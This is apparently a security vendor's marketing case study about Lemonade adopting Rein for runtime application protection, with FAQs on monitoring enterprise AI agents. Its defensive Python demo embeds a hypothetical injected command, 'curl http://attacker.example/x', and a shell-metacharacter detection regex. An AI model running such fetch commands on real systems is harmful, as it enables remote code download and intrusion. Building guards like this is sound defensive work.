Background: Reinventing Insurance – and Rethinking Application Security
“Forget everything you know about insurance.” That line pretty much captures Lemonade – the company that rewrote the rules of an entire industry. With an AI-driven platform and a fully automated customer experience, the company combined a high-velocity tech startup mindset with traditional insurance to change the game for good. That pace demands a security approach that matches their culture: precise, fast, and grounded in real-time data.
Lemonade’s security team operates with the same trailblazing mindset. Protecting a platform that processes millions of real-time decisions requires more than edge defenses or pattern-based alerts; it requires seeing what actually happens inside the application. As their microservices ecosystem grew, the team wanted deeper runtime visibility, accurate exploit detection, and developer-friendly insights that wouldn’t slow innovation.
The Security Team’s Goals
The Lemonade security team’s mission is simple:
“Keep the application running. Stop any attack.” – Jonathan Jaffe, CISO
To achieve that, they needed a solution that could:
- Detect real, exploitable behavior
- Eliminate noise and reduce time spent tuning rules
- Provide deterministic, code-level protection and remediation
- Support developers with clear runtime context
- Evolve toward runtime-informed posture management and automated remediation

Facing The Reality of API Security
Lemonade built a solid API security stack – but quickly discovered its limits. The tools were passive, reliant on patterns, and blind to what the application was actually doing. Noise went up; clarity went down. As Jonathan explained, the challenges were clear:
Too Much Noise, Too Little Precision
“It was noisy… more cleanup than actually acting on security issues. It required a lot of effort to figure out what was going on.”
No Runtime or Code-Level Visibility
“It was really just looking at HTTP calls… the tools weren’t aware of the code at all.”
A Need for Better Developer Experience
“The web app was not easy to figure out and track issues to resolution.”
Finding Answers in Production
When Lemonade evaluated alternatives, Rein stood out for one reason: it finally gave them truth from inside the application.
They needed something more than just a “slightly smarter firewall”. As Jonathan put it, “We needed more visibility into the code itself.”
With Rein, the experience was different.
Deterministic Baselines, Not Guesses
Rein’s contextual baselining (based on full production visibility) immediately changed Lemonade’s confidence in detection.
“The baseline that Rein is building… that was the main thing. We can trust that when something deviates, it’s real.”
Instead of looking at traffic patterns, Rein observes the actual execution of functions, files, libraries, and API behavior – so when something looks off, it is off.
Noise Drops Dramatically
By grounding detection in true application behavior, Rein eliminated the constant cleanup and retuning required by legacy tools.
“We don’t need to chase patterns anymore… Rein puts us in a more secure place than chasing known patterns.”
What used to be a stream of false positives became a small number of high-signal events.
Real Runtime Protection – Even for Zero-Days
Rein doesn’t just detect behavior; it stops it.
“If someone tries to run a command, Rein will block it, as long as it deviates from the baseline.”
This protects Lemonade against the exact type of in-app exploit attempts that network tools – including WAFs – cannot reach, because they only see the HTTP request, not the command the application goes on to execute.
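To make the distinction between pattern matching and baseline deviation concrete, here is a toy execution guard. It is an added illustration written for this page, not Rein’s code, and it does not describe how Rein is implemented. It learns which (calling function, executable) pairs a service legitimately uses, then refuses any command execution that deviates. The application functions, the `attacker.example` host and the fake runner are all constructed for the example. The point it shows: a signature-style check for shell metacharacters waves through `curl http://attacker.example/x`, while the baseline check blocks it because no legitimate code path ever ran a command from that call site.

```python
"""Toy execution-baseline guard (added example, not Rein's implementation).

Learn phase: record (call site, executable) pairs the application actually uses.
Enforce phase: block any command execution outside that baseline, regardless of
whether the argument string matches a known attack pattern.
"""
import inspect
import re
import shlex
from dataclasses import dataclass, field

# Legacy, signature-style rule for comparison: flag common shell metacharacters.
SHELL_METACHARS = re.compile(r"[;&|`$<>]")


def pattern_check(cmdline: str) -> bool:
    """Return True if a signature-based rule would let this command line through."""
    return SHELL_METACHARS.search(cmdline) is None


@dataclass
class ExecBaseline:
    learning: bool = True
    allowed: set = field(default_factory=set)   # {(call_site, executable)}
    blocked: list = field(default_factory=list)  # audit trail of denied attempts

    def _call_site(self) -> str:
        # Two frames up from here: the application function that asked to exec.
        frame = inspect.currentframe().f_back.f_back
        return f"{frame.f_code.co_filename}:{frame.f_code.co_name}"

    def guarded_exec(self, argv, runner):
        """Run argv via `runner` if (call site, argv[0]) is in the learned baseline."""
        key = (self._call_site(), argv[0])
        if self.learning:
            self.allowed.add(key)       # observe and record legitimate behaviour
            return runner(argv)
        if key not in self.allowed:
            self.blocked.append((key[0], shlex.join(argv)))
            raise PermissionError(f"blocked: {argv[0]!r} is not in baseline for {key[0]}")
        return runner(argv)


# --- constructed application code ------------------------------------------

def convert_document(guard, runner, path):
    # Legitimate workflow: this function always shells out to the PDF converter.
    return guard.guarded_exec(["pdftotext", path, "-"], runner)


def render_template(guard, runner, user_input):
    # Simulated injection sink: attacker-controlled text reaches an exec call in a
    # function that never legitimately runs commands during normal operation.
    return guard.guarded_exec(shlex.split(user_input), runner)


def demo():
    calls = []

    def fake_runner(argv):          # stand-in for subprocess.run; nothing executes
        calls.append(argv)
        return 0

    guard = ExecBaseline()
    convert_document(guard, fake_runner, "/tmp/invoice.pdf")   # learn baseline
    guard.learning = False

    convert_document(guard, fake_runner, "/tmp/claim.pdf")     # allowed: in baseline

    injected = "curl http://attacker.example/x"                # hypothetical payload
    signature_check_passed = pattern_check(injected)           # no metachars -> passes
    try:
        render_template(guard, fake_runner, injected)
        baseline_blocked = False
    except PermissionError:
        baseline_blocked = True

    return {
        "runner_calls": len(calls),                  # only the two pdftotext runs
        "signature_check_passed": signature_check_passed,
        "baseline_blocked": baseline_blocked,
        "blocked_log": guard.blocked,
    }


if __name__ == "__main__":
    print(demo())
```

The baseline key deliberately includes the call site: a command that is normal from one function is still a deviation when it appears from another, which is the kind of code-level context an HTTP-only tool cannot see.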
Developers Became Advocates
One unexpected outcome for Lemonade: engineering teams pushed for Rein to move into production.
“Rein moved to production quickly because developers requested it. They wanted the visibility Rein provides.”
This visibility helps developers understand real API usage, package behavior, and execution flows – speeding investigations and improving code quality.
The Bottom Line
Lemonade brought in Rein to see exactly what their apps were doing in real time – no guesses, no noise, no “maybe”. Deterministic visibility plus precise exploitation detection gave them fewer alerts, stronger defenses, and developers who could actually move faster. The result? Production-based security that matches their mandate: keep the app running, stop every attack.
FAQs
Enterprises are rethinking AppSec because enterprise agents now execute customer-facing and regulated business workflows that traditional perimeter defenses cannot fully observe or control.
- Investigate how enterprise agents interact with APIs, internal services, MCP servers, and downstream operational systems during runtime execution
- Prioritize deterministic runtime visibility over pattern matching and theoretical threat modeling
- Correlate execution behavior directly to business outcomes such as claims processing, approvals, payments, or customer decisions
- Build security workflows around operational continuity instead of alert volume alone
Traditional API security approaches are insufficient because they observe traffic patterns without understanding what enterprise agents and applications actually execute in production.
- Trace how enterprise agents invoke APIs, libraries, files, MCPs, and downstream services during live execution
- Validate whether runtime behavior aligns with approved operational workflows and business processes
- Investigate which execution chains can access sensitive systems, regulated data, or customer infrastructure
- Reduce operational noise created by disconnected HTTP-level visibility and static assumptions
Deterministic runtime visibility is critical because enterprise security teams need to know exactly what enterprise agents and applications are doing inside production systems in real time.
- Trace complete execution chains across prompts, APIs, MCP activity, libraries, databases, and external services
- Investigate which users, workflows, or systems triggered sensitive runtime behavior
- Validate whether enterprise agents deviated from approved operational baselines
- Accelerate incident response using execution evidence instead of fragmented logs and assumptions
Enterprises are replacing pattern-based detection because enterprise agent environments generate too much operational noise when security decisions rely on signatures and traffic heuristics alone.
- Baseline legitimate enterprise agent behavior across APIs, tools, MCP servers, libraries, and operational workflows
- Detect deviations tied to abnormal execution paths, unauthorized resource access, or unsafe downstream actions
- Prioritize high-confidence runtime events grounded in real production behavior
- Eliminate excessive tuning and cleanup workflows caused by legacy perimeter-based approaches
Explore how Rein defeats Claude Mythos.
Rein captures the complete execution chain of every enterprise agent and application action and directly connects runtime behavior to operational business outcomes.
- Observe prompts, APIs, libraries, MCP activity, stack traces, and resource access in real time
- Investigate how enterprise agents interact with claims systems, customer workflows, financial infrastructure, or regulated operations
- Correlate execution activity with the exact users, systems, and downstream operational impact involved
- Replace fragmented AppSec assumptions with deterministic execution visibility grounded in production reality
Rein enforces dynamic behavioral guardrails at the execution layer by continuously learning legitimate enterprise agent behavior and blocking unsafe deviations immediately.
- Detect abnormal execution chains involving APIs, MCP servers, tools, libraries, or downstream systems
- Block unauthorized commands, resource access, or operational actions before execution completes
- Protect customer-facing and regulated workflows from unsafe autonomous behavior
- Stop exploitation attempts even when vulnerabilities are unknown or have no published signatures
Discover how Rein secures enterprise agents in your organization.
